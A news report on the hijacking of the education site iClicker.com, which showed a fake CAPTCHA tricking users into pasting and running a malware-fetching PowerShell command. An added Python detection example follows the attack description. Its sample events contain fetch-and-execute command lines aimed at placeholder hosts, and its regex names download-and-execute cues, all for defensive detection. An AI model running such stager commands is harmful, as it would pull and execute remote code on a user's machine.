Education site iClicker.com was hijacked last month to display a malicious CAPTCHA test intended to trick users into installing Windows malware.
The site operates as an IT service for teachers that helps them conduct multiple-choice quizzes or even take attendance. The iClicker website says its products are in use by 5,000 instructors and 7 million students.
The hack placed a fake CAPTCHA test on the landing page for iClicker.com, according to BleepingComputer. Normally, CAPTCHA tests are designed to deter web-scraping bots by asking online visitors to complete a challenge, like identifying objects in an image. But in this case, the malicious CAPTCHA test dressed up the challenge as a set of computer commands: “Press Win + R,” “Press CTRL + V” and then “Enter.”
Unaware users might follow the instructions, thinking it’s an innocuous request. In reality, the first command opens the Windows Run dialog box, a way to launch programs. Pressing “CTRL + V” then pastes malicious computer code that the CAPTCHA page had already placed on the clipboard, and pressing Enter executes it.
The University of Michigan’s IT security team initially warned students about the fake CAPTCHA test earlier this month. The pasted computer code operates as a PowerShell script that will retrieve additional malware when run, giving the hacker remote access to the PC.
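The Run-dialog launch described above leaves a recognisable process lineage on the endpoint: explorer.exe spawning a script host whose command line fetches or decodes a further stage. The following is an added example, not code from the article, iClicker or the University of Michigan, that flags such launches in constructed Sysmon-style process-creation events; the field names, event values and placeholder URLs are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields),
# not taken from the incident; URLs and encoded blobs are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr hxxp://PLACEHOLDER/x | iex\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta hxxp://PLACEHOLDER/captcha.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\Scripts\sched.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\ops\\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc BASE64_PLACEHOLDER"},
]

# Win+R launches run as children of explorer.exe, so a pasted CAPTCHA command
# shows up as explorer.exe spawning a script host directly.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Cues that the command fetches or decodes a stage rather than running a local script.
SUSPICIOUS = re.compile(
    r"(iwr|invoke-webrequest|invoke-expression|\biex\b|downloadstring|-enc|"
    r"hidden|https?://|hxxp)", re.IGNORECASE)

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def flag_clickfix(events):
    """Return command lines that look like a Run-dialog launch of a fetch-and-execute stager."""
    hits = []
    for ev in events:
        if basename(ev["parent"]) != "explorer.exe":
            continue  # not launched from the shell / Run dialog
        if basename(ev["image"]) not in SCRIPT_HOSTS:
            continue  # ordinary program, not a script host
        if SUSPICIOUS.search(ev["cmdline"]):
            hits.append(ev["cmdline"])
    return hits

if __name__ == "__main__":
    for line in flag_clickfix(SAMPLE_EVENTS):
        print("suspicious Run-dialog launch:", line)
```

In a real deployment the same parent/image/command-line logic maps onto a SIEM query over Event ID 4688 or Sysmon Event ID 1 with command-line logging enabled.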
Example of a fake CAPTCHA website (Credit: Malwarebytes)
But it appears the fake CAPTCHA was only on iClicker.com for less than a week. “Users of iClicker are at risk if they logged into the iClicker site and followed the directions in the fake CAPTCHA from April 12-16,” the University of Michigan says.
Parent company Macmillan Learning didn’t immediately respond to a request for comment. But in a security bulletin, iClicker confirmed the hijacking. “An unrelated third party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website,” the notice says. “This third party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days.”
That said, it looks like iClicker didn’t want to attract too much attention. BleepingComputer notes the security bulletin was configured to prevent search engines from indexing it.
Although it’s unclear what malware was installed, the bulletin adds that teachers or students who fell for the fake CAPTCHA test should immediately run antivirus software on their PCs. Those affected should also consider changing their passwords, since the malware may have been designed to steal login credentials and cookies from web browsers.
The incident is also a reminder to be careful around CAPTCHA tests that ask you to perform unusual keyboard commands. Security researchers have also spotted fake CAPTCHA tests targeting gamers.
About Michael Kan
Senior Reporter